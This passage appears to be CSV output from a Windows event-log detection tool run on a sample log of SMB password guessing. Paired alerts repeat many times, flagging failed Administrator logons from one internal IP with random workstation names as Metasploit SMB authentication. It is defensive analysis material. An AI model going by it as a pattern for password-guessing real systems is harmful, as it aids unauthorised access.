Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 